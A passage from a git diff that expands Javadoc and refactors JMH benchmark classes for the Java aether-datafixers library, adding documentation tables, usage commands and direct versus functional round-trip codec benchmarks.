+ * # Run specific benchmark pattern
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="SingleFixBenchmark"
* }
*
- *
Via Fat JAR (Production Runs)
+ *
Via Fat JAR (Production)
+ *
Recommended for production benchmark runs with full JMH isolation:
*
{@code
* # Build the fat JAR
* mvn clean package -pl aether-datafixers-benchmarks -DskipTests
@@ -60,47 +66,115 @@
* # Run with custom parameters
* java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 3 -i 5 -f 1
*
- * # Output JSON results
+ * # Output JSON results for analysis
* java -jar target/*-benchmarks.jar -rf json -rff results.json
*
* # List all available benchmarks
* java -jar target/*-benchmarks.jar -l
+ *
+ * # Profile with async-profiler
+ * java -jar target/*-benchmarks.jar -prof async:output=flamegraph
* }
For integration with test frameworks or custom tooling:
+ *
{@code
+ * // Run all benchmarks
+ * BenchmarkRunner.runAllBenchmarks();
+ *
+ * // Run quick validation (CI/CD)
+ * BenchmarkRunner.runQuickBenchmarks();
+ *
+ * // Run only core benchmarks
+ * BenchmarkRunner.runCoreBenchmarks();
+ *
+ * // Run only format benchmarks
+ * BenchmarkRunner.runFormatBenchmarks();
+ * }
*
*
Default Configuration
- *
- *
Warmup: 5 iterations, 1 second each
- *
Measurement: 10 iterations, 1 second each
- *
Forks: 2 (for statistical significance)
- *
JVM heap: 2GB min/max
- *
+ *
+ *
Setting
Default
Quick Mode
+ *
Warmup iterations
5
2
+ *
Measurement iterations
10
3
+ *
Forks
2
1
+ *
JVM heap
2 GB
1 GB
+ *
+ *
+ *
Common JMH Options
+ *
+ *
Option
Description
Example
+ *
{@code -wi}
Warmup iterations
{@code -wi 3}
+ *
{@code -i}
Measurement iterations
{@code -i 5}
+ *
{@code -f}
Number of forks
{@code -f 1}
+ *
{@code -p}
Parameter value
{@code -p payloadSize=SMALL}
+ *
{@code -t}
Thread count
{@code -t 4}
+ *
{@code -rf}
Result format
{@code -rf json}
+ *
{@code -rff}
Result file
{@code -rff results.json}
+ *
{@code -l}
List benchmarks
{@code -l}
+ *
{@code -prof}
Profiler
{@code -prof gc}
+ *
*
* @author Erik Pförtner
+ * @see de.splatgames.aether.datafixers.benchmarks.core
+ * @see de.splatgames.aether.datafixers.benchmarks.codec
+ * @see de.splatgames.aether.datafixers.benchmarks.concurrent
* @since 1.0.0
*/
public final class BenchmarkRunner {
+ /**
+ * Private constructor to prevent instantiation.
+ */
private BenchmarkRunner() {
// Main class
}
/**
- * Main entry point for running benchmarks.
+ * Main entry point for running benchmarks from the command line.
+ *
+ *
Behavior depends on whether arguments are provided:
+ *
+ *
With arguments: Delegates to JMH's main method, supporting all
+ * standard JMH command-line options
+ *
Without arguments: Runs all benchmarks using default configuration
+ * via {@link #runAllBenchmarks()}
+ *
*
- *
When run without arguments, executes all benchmarks in the package.
- * Supports all standard JMH command-line arguments.
+ *
Exit Codes
+ *
+ *
0 - Successful completion
+ *
Non-zero - Error during benchmark execution
+ *
*
- * @param args command-line arguments (passed to JMH)
+ * @param args command-line arguments (passed directly to JMH if present)
* @throws RunnerException if benchmark execution fails
- * @throws IOException if there is an I/O error
+ * @throws IOException if there is an I/O error reading benchmark metadata
*/
public static void main(final String[] args) throws RunnerException, IOException {
if (args.length > 0) {
@@ -113,9 +187,28 @@ public static void main(final String[] args) throws RunnerException, IOException
}
/**
- * Runs all benchmarks with default configuration.
+ * Runs all benchmarks in the benchmarks package with default configuration.
+ *
+ *
Executes every benchmark class in
+ * {@code de.splatgames.aether.datafixers.benchmarks.*} with production-quality
+ * settings suitable for reliable performance measurements.
+ *
+ *
Configuration
+ *
+ *
Warmup: 5 iterations
+ *
Measurement: 10 iterations
+ *
Forks: 2 (for JIT variance mitigation)
+ *
JVM heap: 2 GB min/max
+ *
+ *
+ *
Note: Running all benchmarks can take significant time depending
+ * on the number of parameter combinations. Consider using
+ * {@link #runQuickBenchmarks()} for validation or {@link #runCoreBenchmarks()}
+ * for focused testing.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runQuickBenchmarks()
+ * @see #runCoreBenchmarks()
*/
public static void runAllBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
@@ -130,11 +223,31 @@ public static void runAllBenchmarks() throws RunnerException {
}
/**
- * Runs a quick subset of benchmarks for validation.
+ * Runs a quick subset of benchmarks for fast validation.
*
- *
Useful for CI/CD pipelines or quick sanity checks.
+ *
Executes only the {@code SingleFixBenchmark} with minimal iterations,
+ * suitable for:
+ *
+ *
CI/CD pipeline smoke tests
+ *
Quick sanity checks during development
+ *
Verifying benchmark infrastructure works correctly
+ *
+ *
+ *
Configuration
+ *
+ *
Benchmark: SingleFixBenchmark only
+ *
Warmup: 2 iterations
+ *
Measurement: 3 iterations
+ *
Forks: 1 (faster but less statistically robust)
+ *
JVM heap: 1 GB min/max
+ *
Payload size: SMALL only
+ *
+ *
+ *
Warning: Results from quick benchmarks should not be used for
+ * performance comparisons due to reduced statistical rigor.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runAllBenchmarks()
*/
public static void runQuickBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
@@ -150,9 +263,30 @@ public static void runQuickBenchmarks() throws RunnerException {
}
/**
- * Runs core migration benchmarks only.
+ * Runs only the core migration benchmarks.
+ *
+ *
Executes benchmarks in the {@code core} package that measure DataFixer
+ * migration performance:
+ *
+ *
{@code SingleFixBenchmark} - Single fix application performance
Use this method when focusing on migration performance without
+ * format-specific or codec overhead considerations.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runFormatBenchmarks()
+ * @see #runAllBenchmarks()
*/
public static void runCoreBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
@@ -167,9 +301,31 @@ public static void runCoreBenchmarks() throws RunnerException {
}
/**
- * Runs format comparison benchmarks only.
+ * Runs only the format comparison benchmarks.
+ *
+ *
Executes benchmarks in the {@code format} package that compare different
+ * DynamicOps implementations:
+ *
+ *
{@code JsonBenchmark} - GsonOps vs JacksonJsonOps
+ *
{@code YamlBenchmark} - SnakeYamlOps vs JacksonYamlOps
+ *
{@code TomlXmlBenchmark} - JacksonTomlOps and JacksonXmlOps
+ *
{@code CrossFormatBenchmark} - Format conversion performance
+ *
+ *
+ *
Configuration
+ *
+ *
Warmup: 5 iterations
+ *
Measurement: 10 iterations
+ *
Forks: 2
+ *
JVM heap: 2 GB min/max
+ *
+ *
+ *
Use this method when evaluating which DynamicOps implementation
+ * to use for a specific use case, or when optimizing format handling.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runCoreBenchmarks()
+ * @see #runAllBenchmarks()
*/
public static void runFormatBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index a55b729..56405aa 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -49,10 +49,95 @@
/**
* JMH benchmark for collection codec encode/decode performance.
*
- *
Measures the performance of encoding and decoding lists of various sizes
- * using the {@link Codecs#list(Codec)} API.
+ *
Measures the performance of list codec operations with parameterized collection
+ * sizes. These benchmarks reveal how codec performance scales with data volume and
+ * help identify potential bottlenecks in collection traversal and element processing.
+ *
+ *
Benchmark Categories
+ *
+ *
String List Benchmarks
+ *
Measure {@code List} codec operations:
+ *
+ *
{@link #encodeStringList} - Encode string list to JSON array
+ *
{@link #decodeStringList} - Decode JSON array to string list
+ *
{@link #roundTripStringListDirect} - Complete round-trip with direct extraction
+ *
{@link #roundTripStringListFunctional} - Complete round-trip using functional API
+ *
+ *
+ *
Integer List Benchmarks
+ *
Measure {@code List} codec operations:
+ *
+ *
{@link #encodeIntList} - Encode integer list to JSON array
+ *
{@link #decodeIntList} - Decode JSON array to integer list
+ *
{@link #roundTripIntListDirect} - Complete round-trip with direct extraction
+ *
{@link #roundTripIntListFunctional} - Complete round-trip using functional API
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
listSize
10, 100, 1000
Number of elements in the test list
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for JIT variance mitigation)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds (appropriate for collection operations)
+ *
+ *
+ *
Test Data Generation
+ *
+ *
Collection
Element Pattern
Example (size=3)
+ *
String List
{@code "item-" + index}
["item-0", "item-1", "item-2"]
+ *
Integer List
{@code index}
[0, 1, 2]
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Linear scaling: Expected behavior where time scales proportionally with list size.
+ * If 100 elements takes 10x longer than 10 elements, scaling is linear.
+ *
Sub-linear scaling: Better than expected, may indicate JIT optimizations
+ * or efficient batch processing.
+ *
Super-linear scaling: Performance degrades faster than list size grows.
+ * May indicate memory pressure, GC overhead, or algorithmic inefficiency.
+ *
String vs Integer: String lists typically have higher overhead due to
+ * object allocation and potential string interning effects.
+ *
Direct vs Functional: Functional API (using {@code flatMap}) may show
+ * slight overhead from lambda creation and DataResult chaining.
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run all collection codec benchmarks
+ * java -jar benchmarks.jar CollectionCodecBenchmark
+ *
+ * # Run with specific list size
+ * java -jar benchmarks.jar CollectionCodecBenchmark -p listSize=1000
+ *
+ * # Run only string list benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.*String.*"
+ *
+ * # Run only encode benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.encode.*"
+ *
+ * # Compare direct vs functional round-trip
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.roundTrip.*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar CollectionCodecBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate JSON report for analysis
+ * java -jar benchmarks.jar CollectionCodecBenchmark -rf json -rff collection_results.json
+ * }
*
* @author Erik Pförtner
+ * @see PrimitiveCodecBenchmark
+ * @see de.splatgames.aether.datafixers.api.codec.Codecs#list(Codec)
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -63,24 +148,89 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class CollectionCodecBenchmark {
+ /**
+ * The number of elements in test lists, injected by JMH.
+ *
+ *
This parameter controls the size of both string and integer lists.
+ * Different sizes reveal scaling characteristics of the list codec:
+ *
+ *
10: Small list baseline, minimal memory/GC impact
+ *
100: Medium list, typical real-world collection size
+ *
1000: Large list stress test, reveals scaling behavior
+ *
+ */
@Param({"10", "100", "1000"})
private int listSize;
+ /**
+ * The DynamicOps implementation used for all codec operations.
+ *
+ *
GsonOps is used as the reference JSON implementation for benchmarks.
Creates list codecs by composing primitive codecs with {@link Codecs#list(Codec)}
+ *
Populates test lists with {@link #listSize} elements each
+ *
Pre-encodes both lists to JSON for decode benchmark isolation
+ *
+ *
+ *
Using {@link ArrayList} with pre-sized capacity avoids resizing overhead
+ * during population.
+ */
@Setup(Level.Trial)
public void setup() {
+ this.ops = GsonOps.INSTANCE;
+
this.stringListCodec = Codecs.list(Codecs.STRING);
this.intListCodec = Codecs.list(Codecs.INT);
- // Generate test data
this.stringList = new ArrayList<>(this.listSize);
this.intList = new ArrayList<>(this.listSize);
@@ -89,92 +239,168 @@ public void setup() {
this.intList.add(i);
}
- // Pre-encode for decode benchmarks
- this.encodedStringList = this.stringListCodec.encodeStart(GsonOps.INSTANCE, this.stringList)
+ this.encodedStringList = this.stringListCodec.encodeStart(this.ops, this.stringList)
.result().orElseThrow();
- this.encodedIntList = this.intListCodec.encodeStart(GsonOps.INSTANCE, this.intList)
+ this.encodedIntList = this.intListCodec.encodeStart(this.ops, this.intList)
.result().orElseThrow();
}
- // ==================== String List ====================
+ // ==================== String List Benchmarks ====================
/**
- * Benchmarks encoding a list of strings.
+ * Benchmarks string list encoding to JSON array.
+ *
+ *
Measures the performance of converting a {@code List} to a JSON
+ * array element. Each string element is individually encoded and added to the
+ * resulting array.
+ *
+ *
Performance factors:
+ *
+ *
List iteration overhead
+ *
Per-element string encoding cost
+ *
JSON array construction and element addition
+ *
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void encodeStringList(final Blackhole blackhole) {
- final DataResult result = this.stringListCodec.encodeStart(
- GsonOps.INSTANCE, this.stringList);
+ final DataResult result = this.stringListCodec.encodeStart(this.ops, this.stringList);
blackhole.consume(result);
}
/**
- * Benchmarks decoding a list of strings.
+ * Benchmarks string list decoding from JSON array.
+ *
+ *
Measures the performance of extracting a {@code List} from a
+ * pre-encoded JSON array. Each array element is decoded to a string and
+ * collected into the result list.
+ *
+ *
Performance factors:
+ *
+ *
JSON array traversal
+ *
Per-element string extraction
+ *
Result list construction and population
+ *
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void decodeStringList(final Blackhole blackhole) {
- final DataResult, JsonElement>> result = this.stringListCodec.decode(
- GsonOps.INSTANCE, this.encodedStringList);
+ final DataResult, JsonElement>> result = this.stringListCodec.decode(this.ops, this.encodedStringList);
blackhole.consume(result);
}
- // ==================== Integer List ====================
+ // ==================== Integer List Benchmarks ====================
/**
- * Benchmarks encoding a list of integers.
+ * Benchmarks integer list encoding to JSON array.
+ *
+ *
Measures the performance of converting a {@code List} to a JSON
+ * array element. Integer encoding is typically faster than string encoding
+ * due to simpler value representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void encodeIntList(final Blackhole blackhole) {
- final DataResult result = this.intListCodec.encodeStart(
- GsonOps.INSTANCE, this.intList);
+ final DataResult result = this.intListCodec.encodeStart(this.ops, this.intList);
blackhole.consume(result);
}
/**
- * Benchmarks decoding a list of integers.
+ * Benchmarks integer list decoding from JSON array.
+ *
+ *
Measures the performance of extracting a {@code List} from a
+ * pre-encoded JSON array. Integer decoding involves numeric parsing from
+ * JSON number elements.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void decodeIntList(final Blackhole blackhole) {
- final DataResult, JsonElement>> result = this.intListCodec.decode(
- GsonOps.INSTANCE, this.encodedIntList);
+ final DataResult, JsonElement>> result = this.intListCodec.decode(this.ops, this.encodedIntList);
blackhole.consume(result);
}
- // ==================== Round Trip ====================
+ // ==================== Round-Trip Benchmarks (Direct Style) ====================
+
+ /**
+ * Benchmarks complete string list round-trip with direct result extraction.
+ *
+ *
Measures the combined performance of encoding a {@code List} to JSON
+ * and immediately decoding it back. Uses {@code result().orElseThrow()} for
+ * direct value extraction, representing typical imperative usage patterns.
+ *
+ *
This benchmark is useful for scenarios where data is temporarily serialized
+ * (e.g., caching, message passing) and immediately deserialized.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripStringListDirect(final Blackhole blackhole) {
+ final JsonElement json = this.stringListCodec.encodeStart(this.ops, this.stringList)
+ .result().orElseThrow();
+ final Pair, JsonElement> decoded = this.stringListCodec.decode(this.ops, json)
+ .result().orElseThrow();
+ blackhole.consume(decoded);
+ }
+
+ /**
+ * Benchmarks complete integer list round-trip with direct result extraction.
+ *
+ *
Measures the combined performance of encoding a {@code List} to JSON
+ * and immediately decoding it back using direct value extraction.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripIntListDirect(final Blackhole blackhole) {
+ final JsonElement json = this.intListCodec.encodeStart(this.ops, this.intList)
+ .result().orElseThrow();
+ final Pair, JsonElement> decoded = this.intListCodec.decode(this.ops, json)
+ .result().orElseThrow();
+ blackhole.consume(decoded);
+ }
+
+ // ==================== Round-Trip Benchmarks (Functional Style) ====================
/**
- * Benchmarks round-trip encoding and decoding of a string list.
+ * Benchmarks complete string list round-trip using functional API.
+ *
+ *
Measures the combined performance of encoding and decoding using
+ * {@link DataResult#flatMap} for monadic composition. This represents
+ * the functional programming style where operations are chained without
+ * explicit result unwrapping.
+ *
+ *
Comparing with {@link #roundTripStringListDirect} reveals the overhead
+ * (if any) of the functional API approach versus direct extraction.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void roundTripStringList(final Blackhole blackhole) {
- final DataResult encoded = this.stringListCodec.encodeStart(
- GsonOps.INSTANCE, this.stringList);
+ public void roundTripStringListFunctional(final Blackhole blackhole) {
+ final DataResult encoded = this.stringListCodec.encodeStart(this.ops, this.stringList);
final DataResult, JsonElement>> decoded = encoded.flatMap(
- json -> this.stringListCodec.decode(GsonOps.INSTANCE, json));
+ json -> this.stringListCodec.decode(this.ops, json)
+ );
blackhole.consume(decoded);
}
/**
- * Benchmarks round-trip encoding and decoding of an integer list.
+ * Benchmarks complete integer list round-trip using functional API.
+ *
+ *
Measures the combined performance of encoding and decoding using
+ * monadic composition via {@link DataResult#flatMap}.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void roundTripIntList(final Blackhole blackhole) {
- final DataResult encoded = this.intListCodec.encodeStart(
- GsonOps.INSTANCE, this.intList);
+ public void roundTripIntListFunctional(final Blackhole blackhole) {
+ final DataResult encoded = this.intListCodec.encodeStart(this.ops, this.intList);
final DataResult, JsonElement>> decoded = encoded.flatMap(
- json -> this.intListCodec.decode(GsonOps.INSTANCE, json));
+ json -> this.intListCodec.decode(this.ops, json)
+ );
blackhole.consume(decoded);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index ad44bd4..7e9c8da 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -43,12 +43,102 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for primitive codec encode/decode performance.
+ * JMH benchmark for primitive type codec encode/decode performance.
*
- *
Measures the performance of encoding and decoding primitive types
- * using the {@link Codecs} API.
+ *
Measures the baseline performance of the fundamental codec operations for
+ * primitive Java types. These benchmarks establish the lower bound for codec
+ * performance and help identify overhead introduced by more complex codec
+ * compositions.
+ *
+ *
Benchmark Categories
+ *
+ *
Encode Benchmarks
+ *
Measure Java value to JSON element conversion:
+ *
+ *
{@link #encodeBool} - Boolean encoding
+ *
{@link #encodeInt} - Integer encoding
+ *
{@link #encodeLong} - Long encoding
+ *
{@link #encodeFloat} - Float encoding
+ *
{@link #encodeDouble} - Double encoding
+ *
{@link #encodeString} - String encoding
+ *
+ *
+ *
Decode Benchmarks
+ *
Measure JSON element to Java value conversion:
+ *
+ *
{@link #decodeBool} - Boolean decoding
+ *
{@link #decodeInt} - Integer decoding
+ *
{@link #decodeLong} - Long decoding
+ *
{@link #decodeFloat} - Float decoding
+ *
{@link #decodeDouble} - Double decoding
+ *
{@link #decodeString} - String decoding
+ *
+ *
+ *
Round-Trip Benchmarks
+ *
Measure complete encode-then-decode cycles:
+ *
+ *
{@link #roundTripIntDirect} - Integer round-trip with direct result extraction
+ *
{@link #roundTripStringDirect} - String round-trip with direct result extraction
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for JIT variance mitigation)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Nanoseconds (for fine-grained primitive ops)
+ *
+ *
+ *
Test Values
+ *
+ *
Type
Value
Notes
+ *
boolean
{@code true}
Single bit representation
+ *
int
{@code 42}
Small positive integer
+ *
long
{@code 123456789L}
Value exceeding int range representation
+ *
float
{@code 3.14159f}
Pi approximation (tests decimal handling)
+ *
double
{@code 2.718281828}
Euler's number (tests precision)
+ *
String
{@code "benchmark-test-string"}
21-character ASCII string
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Encode vs Decode: Encoding typically allocates new JSON elements; decoding
+ * extracts values from existing elements. Similar performance is expected.
+ *
Numeric types: All numeric types should have similar performance as they
+ * map directly to JSON number primitives.
+ *
String codec: May show slightly different characteristics due to string
+ * interning and character encoding considerations.
+ *
Round-trip overhead: Should be approximately encode + decode time plus
+ * minimal DataResult unwrapping overhead.
*
* @author Erik Pförtner
+ * @see CollectionCodecBenchmark
+ * @see de.splatgames.aether.datafixers.api.codec.Codecs
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -59,131 +149,319 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class PrimitiveCodecBenchmark {
- // Test values
+ /**
+ * Test boolean value for encoding benchmarks.
+ */
private static final boolean TEST_BOOL = true;
+
+ /**
+ * Test integer value for encoding benchmarks.
+ *
+ *
A small positive integer that fits in a single JSON number token.
+ */
private static final int TEST_INT = 42;
+
+ /**
+ * Test long value for encoding benchmarks.
+ *
+ *
A value that exceeds typical int range to test long-specific handling.
+ */
private static final long TEST_LONG = 123456789L;
+
+ /**
+ * Test float value for encoding benchmarks.
+ *
+ *
Pi approximation to test decimal point handling and precision.
+ */
private static final float TEST_FLOAT = 3.14159f;
+
+ /**
+ * Test double value for encoding benchmarks.
+ *
+ *
Euler's number with extended precision to test double encoding accuracy.
+ */
private static final double TEST_DOUBLE = 2.718281828;
+
+ /**
+ * Test string value for encoding benchmarks.
+ *
+ *
A 21-character ASCII string representing typical field values.
+ */
private static final String TEST_STRING = "benchmark-test-string";
- // Pre-encoded values for decode benchmarks
+ /**
+ * The DynamicOps implementation used for all codec operations.
+ *
+ *
GsonOps is used as the reference implementation for JSON format benchmarks.
+ */
+ private GsonOps ops;
+
+ /**
+ * Pre-encoded boolean JSON element for decode benchmarks.
+ */
private JsonElement encodedBool;
+
+ /**
+ * Pre-encoded integer JSON element for decode benchmarks.
+ */
private JsonElement encodedInt;
+
+ /**
+ * Pre-encoded long JSON element for decode benchmarks.
+ */
private JsonElement encodedLong;
+
+ /**
+ * Pre-encoded float JSON element for decode benchmarks.
+ */
private JsonElement encodedFloat;
+
+ /**
+ * Pre-encoded double JSON element for decode benchmarks.
+ */
private JsonElement encodedDouble;
+
+ /**
+ * Pre-encoded string JSON element for decode benchmarks.
+ */
private JsonElement encodedString;
+ /**
+ * Initializes pre-encoded JSON elements for decode benchmarks.
+ *
+ *
Pre-encoding ensures decode benchmarks measure only decoding performance
+ * without encoding overhead. All test values are encoded once at trial start.
Measures the performance of converting a Java {@code boolean} to a
+ * JSON boolean element via {@link Codecs#BOOL}.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeBool(final Blackhole blackhole) {
- final DataResult result = Codecs.BOOL.encodeStart(GsonOps.INSTANCE, TEST_BOOL);
+ final DataResult result = Codecs.BOOL.encodeStart(this.ops, TEST_BOOL);
blackhole.consume(result);
}
+ /**
+ * Benchmarks boolean value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Boolean} from a
+ * pre-encoded JSON boolean element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeBool(final Blackhole blackhole) {
- final DataResult> result = Codecs.BOOL.decode(GsonOps.INSTANCE, this.encodedBool);
+ final DataResult> result = Codecs.BOOL.decode(this.ops, this.encodedBool);
blackhole.consume(result);
}
- // ==================== Integer ====================
+ // ==================== Integer Benchmarks ====================
+ /**
+ * Benchmarks integer value encoding to JSON.
+ *
+ *
Measures the performance of converting a Java {@code int} to a
+ * JSON number element via {@link Codecs#INT}.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeInt(final Blackhole blackhole) {
- final DataResult result = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
+ final DataResult result = Codecs.INT.encodeStart(this.ops, TEST_INT);
blackhole.consume(result);
}
+ /**
+ * Benchmarks integer value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Integer} from a
+ * pre-encoded JSON number element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeInt(final Blackhole blackhole) {
- final DataResult> result = Codecs.INT.decode(GsonOps.INSTANCE, this.encodedInt);
+ final DataResult> result = Codecs.INT.decode(this.ops, this.encodedInt);
blackhole.consume(result);
}
- // ==================== Long ====================
+ // ==================== Long Benchmarks ====================
+ /**
+ * Benchmarks long value encoding to JSON.
+ *
+ *
Measures the performance of converting a Java {@code long} to a
+ * JSON number element via {@link Codecs#LONG}.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeLong(final Blackhole blackhole) {
- final DataResult result = Codecs.LONG.encodeStart(GsonOps.INSTANCE, TEST_LONG);
+ final DataResult result = Codecs.LONG.encodeStart(this.ops, TEST_LONG);
blackhole.consume(result);
}
+ /**
+ * Benchmarks long value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Long} from a
+ * pre-encoded JSON number element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeLong(final Blackhole blackhole) {
- final DataResult> result = Codecs.LONG.decode(GsonOps.INSTANCE, this.encodedLong);
+ final DataResult> result = Codecs.LONG.decode(this.ops, this.encodedLong);
blackhole.consume(result);
}
- // ==================== Float ====================
+ // ==================== Float Benchmarks ====================
+ /**
+ * Benchmarks float value encoding to JSON.
+ *
+ *
Measures the performance of converting a Java {@code float} to a
+ * JSON number element via {@link Codecs#FLOAT}. Float encoding involves
+ * decimal representation which may differ from integer encoding.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeFloat(final Blackhole blackhole) {
- final DataResult result = Codecs.FLOAT.encodeStart(GsonOps.INSTANCE, TEST_FLOAT);
+ final DataResult result = Codecs.FLOAT.encodeStart(this.ops, TEST_FLOAT);
blackhole.consume(result);
}
+ /**
+ * Benchmarks float value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Float} from a
+ * pre-encoded JSON number element. Decoding involves parsing the decimal
+ * representation back to IEEE 754 single-precision format.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeFloat(final Blackhole blackhole) {
- final DataResult> result = Codecs.FLOAT.decode(GsonOps.INSTANCE, this.encodedFloat);
+ final DataResult> result = Codecs.FLOAT.decode(this.ops, this.encodedFloat);
blackhole.consume(result);
}
- // ==================== Double ====================
+ // ==================== Double Benchmarks ====================
+ /**
+ * Benchmarks double value encoding to JSON.
+ *
+ *
Measures the performance of converting a Java {@code double} to a
+ * JSON number element via {@link Codecs#DOUBLE}. Double encoding preserves
+ * higher precision than float but uses similar mechanisms.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeDouble(final Blackhole blackhole) {
- final DataResult result = Codecs.DOUBLE.encodeStart(GsonOps.INSTANCE, TEST_DOUBLE);
+ final DataResult result = Codecs.DOUBLE.encodeStart(this.ops, TEST_DOUBLE);
blackhole.consume(result);
}
+ /**
+ * Benchmarks double value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Double} from a
+ * pre-encoded JSON number element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeDouble(final Blackhole blackhole) {
- final DataResult> result = Codecs.DOUBLE.decode(GsonOps.INSTANCE, this.encodedDouble);
+ final DataResult> result = Codecs.DOUBLE.decode(this.ops, this.encodedDouble);
blackhole.consume(result);
}
- // ==================== String ====================
+ // ==================== String Benchmarks ====================
+ /**
+ * Benchmarks string value encoding to JSON.
+ *
+ *
Measures the performance of converting a Java {@code String} to a
+ * JSON string element via {@link Codecs#STRING}. String encoding may involve
+ * escape sequence handling for special characters.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeString(final Blackhole blackhole) {
- final DataResult result = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
+ final DataResult result = Codecs.STRING.encodeStart(this.ops, TEST_STRING);
blackhole.consume(result);
}
+ /**
+ * Benchmarks string value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code String} from a
+ * pre-encoded JSON string element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeString(final Blackhole blackhole) {
- final DataResult> result = Codecs.STRING.decode(GsonOps.INSTANCE, this.encodedString);
+ final DataResult> result = Codecs.STRING.decode(this.ops, this.encodedString);
blackhole.consume(result);
}
- // ==================== Round Trip ====================
+ // ==================== Round-Trip Benchmarks ====================
+ /**
+ * Benchmarks complete integer round-trip (encode then decode).
+ *
+ *
Measures the combined performance of encoding a Java {@code int} to JSON
+ * and immediately decoding it back. Uses direct result extraction via
+ * {@code result().orElseThrow()} to measure the typical non-functional usage pattern.
+ *
+ *
Round-trip performance is important for scenarios where data is temporarily
+ * serialized (e.g., caching, IPC) and immediately deserialized.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
- public void roundTripInt(final Blackhole blackhole) {
- final DataResult encoded = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
